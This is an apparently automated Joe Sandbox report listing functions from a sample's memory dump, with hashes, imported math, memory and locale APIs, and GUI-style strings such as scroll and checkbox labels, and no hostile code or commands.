Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: sqrtf
String ID:
API String ID: 321154650-0
Opcode ID: d0354dbd71e7030d5bded96ea694d1369bacf779f8b23e7d26d1dbb03177f4ad
Instruction ID: b88aea86789ce544f1a6c8ed45f94d6d9d945f9324f443809c3ecbd0ab4cd779
Opcode Fuzzy Hash: d0354dbd71e7030d5bded96ea694d1369bacf779f8b23e7d26d1dbb03177f4ad
Instruction Fuzzy Hash: B8924933920B889AD712CF3785821A9B760FF6D784719DB16EA0867776DB34F1A4DB00

Function 00007FF68B49D470 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 419COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49D66E
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49D6E3
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49D7CF

Strings

(, xrefs: 00007FF68B49D9EF

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: sqrtf
String ID: (
API String ID: 321154650-3887548279
Opcode ID: 2f311027faccff7dd881e195b7fe7286059ee0ec87fa41f57f7eea428b0ada40
Instruction ID: 79d8883693d768ca6a6113d038308d00f4ccfd4f6d27f290f74ef084d7916b6e
Opcode Fuzzy Hash: 2f311027faccff7dd881e195b7fe7286059ee0ec87fa41f57f7eea428b0ada40
Instruction Fuzzy Hash: 1F129033924BC886D312CF3A85421ADB361FF6E788B19D716EA0873676DF35A1A5D700

Function 00007FF68B48B875 Relevance: 8.3, APIs: 1, Strings: 4, Instructions: 778COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B493280: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4932B3
Part of subcall function 00007FF68B493280: memcpy.VCRUNTIME140 ref: 00007FF68B4932CF
Part of subcall function 00007FF68B493280: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4932EF

memchr.VCRUNTIME140 ref: 00007FF68B48C0FE

Strings

%.*s, xrefs: 00007FF68B48C12E
#CLOSE, xrefs: 00007FF68B48BCFC
#COLLAPSE, xrefs: 00007FF68B48BC95
%*s%.*s, xrefs: 00007FF68B48C153

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: freemallocmemchrmemcpy
String ID: %*s%.*s$ %.*s$#CLOSE$#COLLAPSE
API String ID: 3682640872-4275869412
Opcode ID: 2ce57d9284d9ef0e70a83944aa9e319a8bdb969bab05396b12aca257139112c0
Instruction ID: ae416c0f74b1ea05b98863dd03d395c5ec49e61c6f41f6851be3e1250628f246
Opcode Fuzzy Hash: 2ce57d9284d9ef0e70a83944aa9e319a8bdb969bab05396b12aca257139112c0
Instruction Fuzzy Hash: 5192C432A04B89DBD716CB3685412E9B7A0FF5D744F089739DB18A75A6DF38B0A4CB40

Function 00007FF68B498BA0 Relevance: 7.8, APIs: 6, Instructions: 280COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B498C25
memset.VCRUNTIME140 ref: 00007FF68B498D1F
memset.VCRUNTIME140 ref: 00007FF68B498D38

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memset$malloc
String ID:
API String ID: 1671641884-0
Opcode ID: 73fda1adc7783b6dc2bc5ba3034a00d0588fe211ed4dabdaf8867232c2ff8382
Instruction ID: e5ae297457708969000c6d77e4853fd91640ee8eea56936ce1cbdf965861ed4a
Opcode Fuzzy Hash: 73fda1adc7783b6dc2bc5ba3034a00d0588fe211ed4dabdaf8867232c2ff8382
Instruction Fuzzy Hash: A3D1B532909AC5C6E7658F2AD1412A9B364FF5CB84F089735DB48A3779EF38E551CB00

Function 00007FF68B4AF040 Relevance: 6.5, APIs: 4, Instructions: 451COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AF1FF
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AF232
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AF5DE
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AF64E

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 9b970626a51ef16c0d90f84d468d31c4e4b87833e8d13c11776a59ccd446aa78
Instruction ID: 20ea2f27ece7ccc85764f791678c5365ed8ce931cb837c63afe8ced5b9ee0b3c
Opcode Fuzzy Hash: 9b970626a51ef16c0d90f84d468d31c4e4b87833e8d13c11776a59ccd446aa78
Instruction Fuzzy Hash: 6B122C22D09B89C6E613963750032B96250BF6E7C4F1C9B36ED49F76B6DF297181CB00

Function 00007FF68B4A3A70 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 347COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140 ref: 00007FF68B4A3BF3
memchr.VCRUNTIME140 ref: 00007FF68B4A3CC1
memchr.VCRUNTIME140 ref: 00007FF68B4A3D9E

Strings

..., xrefs: 00007FF68B4A3A73

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memchr
String ID: ...
API String ID: 3297308162-440645147
Opcode ID: c6435483ec3d671f3d85b7d4afd6859e99abfc328924778e390f82392c2f1fda
Instruction ID: f22ab8bd35bfc4012dc79c8103dabb2ff244b6fad84aa33a0d2f27bf6f5b179f
Opcode Fuzzy Hash: c6435483ec3d671f3d85b7d4afd6859e99abfc328924778e390f82392c2f1fda
Instruction Fuzzy Hash: BFF1BB329487C9C1E2529B3690023F9B350FF6D784F189736EA48775B6EF79A581DB00

Function 00007FF68B4AEA70 Relevance: 6.3, APIs: 4, Instructions: 345COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AEBEA
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AEC0B
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AEF35
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AEF9D

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 27d724f9d89d8e31fa2915028225f72f30567e0b78aab85fd24df9c59b0333bf
Instruction ID: 828eef6fcebf9bb7d377a0e8e048c66cba6eb5c6359e63e893f710e06452abfb
Opcode Fuzzy Hash: 27d724f9d89d8e31fa2915028225f72f30567e0b78aab85fd24df9c59b0333bf
Instruction Fuzzy Hash: C9E1E622D0868DC5E2139B3750431B9A351BF6E784F2D9B36ED68B76B5DF287581CB00

Function 00007FF68B4AE4B0 Relevance: 6.3, APIs: 4, Instructions: 335COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AE61F
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AE633
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AE991
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AE9DA

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: a8716a77cc624c65f86a60f56604ac373fc2b09dee02c0982d31be60c1d05c81
Instruction ID: d3eeafc3e220797a0976927335c354b02a8c9655f10ecd099c982256d5eff713
Opcode Fuzzy Hash: a8716a77cc624c65f86a60f56604ac373fc2b09dee02c0982d31be60c1d05c81
Instruction Fuzzy Hash: 92E1A922D087C9C5E262963750431BD6350BF6E784F1DAB36ED68B727ADF297581CB00

Function 00007FF68B4CB79C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF68B4CB7C8
GetCurrentThreadId.KERNEL32 ref: 00007FF68B4CB7D6
GetCurrentProcessId.KERNEL32 ref: 00007FF68B4CB7E2
QueryPerformanceCounter.KERNEL32 ref: 00007FF68B4CB7F2

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 68b17967bcc8f24075929cf533a102afb4a1d372892b07f6497a9256c3c38c92
Instruction ID: 180a2c32205ede117101bc9738abfd009c941a2fa91d19d287c54e005d39f131
Opcode Fuzzy Hash: 68b17967bcc8f24075929cf533a102afb4a1d372892b07f6497a9256c3c38c92
Instruction Fuzzy Hash: 69111C22B54F05CAEB008B60E8552B933A4FB1DB58F441E35DA6D877A8DF7CE169C340

Function 00007FF68B4CB920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF68B4B1965), ref: 00007FF68B4CB946
FormatMessageA.KERNEL32 ref: 00007FF68B4CB979

Strings

!x-sys-default-locale, xrefs: 00007FF68B4CB939

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: de6593503dd31d5c32caa29e898329b389dd4942f4c7a2da7046951feceb99c3
Instruction ID: 5ca5c16a64adbde7acc960c8fa91a3e91a10f14a3e978c393d5de18d5302e31c
Opcode Fuzzy Hash: de6593503dd31d5c32caa29e898329b389dd4942f4c7a2da7046951feceb99c3
Instruction Fuzzy Hash: 16018871B08B46C2E7118B12B46177A6661FF88B95F448139D68D87AACCF3CE50DC700

Function 00007FF68B4A7680 Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 436COMMON

Download Yara Rule

Strings

%.*s, xrefs: 00007FF68B4A7EEE
%*s%.*s, xrefs: 00007FF68B4A7F13

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID:
String ID: %*s%.*s$ %.*s
API String ID: 0-3400057116
Opcode ID: d7835d36624c6e4837c03091a680af5c084d6deef8ca5dd22d6340a9da368d8e
Instruction ID: 487aa8d31abbf8e5e5f45f448f636a941bb5b9a8b27695c93cb54bb72a54c025
Opcode Fuzzy Hash: d7835d36624c6e4837c03091a680af5c084d6deef8ca5dd22d6340a9da368d8e
Instruction Fuzzy Hash: A722A332A08695C5E721CB3694411FEBB60FF5D398F149339EA58A76B9EF38A444CF40

Function 00007FF68B49A800 Relevance: 4.2, APIs: 3, Instructions: 418COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4981F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49834C
Part of subcall function 00007FF68B4981F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B498379
Part of subcall function 00007FF68B4981F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4983A0
Part of subcall function 00007FF68B4981F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4983C3

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49ACC7

Part of subcall function 00007FF68B499C40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B499CFA

Part of subcall function 00007FF68B499250: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B499352

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49AC8B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49ACA6

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: free$ceilffloorfmalloc
String ID:
API String ID: 573317343-0
Opcode ID: 7a29dc14ebe9a29ac3c6486ad4e6fc0386cc38f741e23540c2c35460d7584c42
Instruction ID: d16b6f2b660671d1a554fe51dc7c65e2362cdb7ce7707790c6da842579426566
Opcode Fuzzy Hash: 7a29dc14ebe9a29ac3c6486ad4e6fc0386cc38f741e23540c2c35460d7584c42
Instruction Fuzzy Hash: BA12A032A18B94CAE311CB3595416BD77B4FF5D744F15832AEE88A3669EF38E491CB00

Function 00007FF68B4B0D80 Relevance: 3.1, APIs: 2, Instructions: 139COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4B0E68

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 6e0e5c095aae63478f4a1cf7ab335ddc02efa7da69751c8db52d8338c377c1d1
Instruction ID: 874566ab943130d914a2a0b4aa7b684fb23f80ee3c1e6b23de286810802c4755
Opcode Fuzzy Hash: 6e0e5c095aae63478f4a1cf7ab335ddc02efa7da69751c8db52d8338c377c1d1
Instruction Fuzzy Hash: 2A41F811E18B8D82E812867600039BDC5417F6E7C6E599B35EA4FB37BBEF2971D2C600

Function 00007FF68B4A5220 Relevance: 2.9, Strings: 2, Instructions: 416COMMON

Download Yara Rule

Strings

#SCROLLX, xrefs: 00007FF68B4A5259
#SCROLLY, xrefs: 00007FF68B4A5263

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID:
String ID: #SCROLLX$#SCROLLY
API String ID: 0-350977493
Opcode ID: 3f79e68f919ed87ebcc83bb1a63c1ce2b24f9297621096451a16576b666a81a2
Instruction ID: c607242d1d0f766539ac9533263f6ec77f4a37caec00dfcb5c5134b21036eefb
Opcode Fuzzy Hash: 3f79e68f919ed87ebcc83bb1a63c1ce2b24f9297621096451a16576b666a81a2
Instruction Fuzzy Hash: D012A422D18BC9C5E212CA3791421B9B750EF7E385F28EB26FA45765B6DF25B0D1CB00

Function 00007FF68B4A0BA0 Relevance: 2.8, Strings: 2, Instructions: 314COMMON

Download Yara Rule

Strings

- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X , xrefs: 00007FF68B4A0BDD
..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X..., xrefs: 00007FF68B4A0BFC

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID:
String ID: - -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X $..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...
API String ID: 0-4293514333
Opcode ID: 4e449b9e0027eaf29c9138731245b7fee6dff2865554fa47f10f3ebceb760723
Instruction ID: e045ce706509468f33373a2e1bdec36c9b8bed3c25b5a3f7c29f2683fdd9bf50
Opcode Fuzzy Hash: 4e449b9e0027eaf29c9138731245b7fee6dff2865554fa47f10f3ebceb760723
Instruction Fuzzy Hash: 82D11A23B046D489D755CF2AD8C5A7D7B9AEB98B02B4AC176CE49C23A1EF7AC445C310

Function 00007FF68B4A5990 Relevance: 2.8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

[ ], xrefs: 00007FF68B4A5E33
[x], xrefs: 00007FF68B4A5E2C

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID:
String ID: [ ]$[x]
API String ID: 0-3323218928
Opcode ID: b8b6148c93a4117ed861a16286f5e52501efab6a4ffa86e6567521de6220ef5c
Instruction ID: de3e197e63d261355b9c47261962741c3c1cbf457ddb0feccff668e79dfb86f9
Opcode Fuzzy Hash: b8b6148c93a4117ed861a16286f5e52501efab6a4ffa86e6567521de6220ef5c
Instruction Fuzzy Hash: 5BE1A832918B9985E212DB3694421B9B350FF6E384F089736FE58675BADF39B581CB00

Function 00007FF68B4BA6E0 Relevance: 2.8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00007FF68B4BA732
VUUU, xrefs: 00007FF68B4BA74C

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

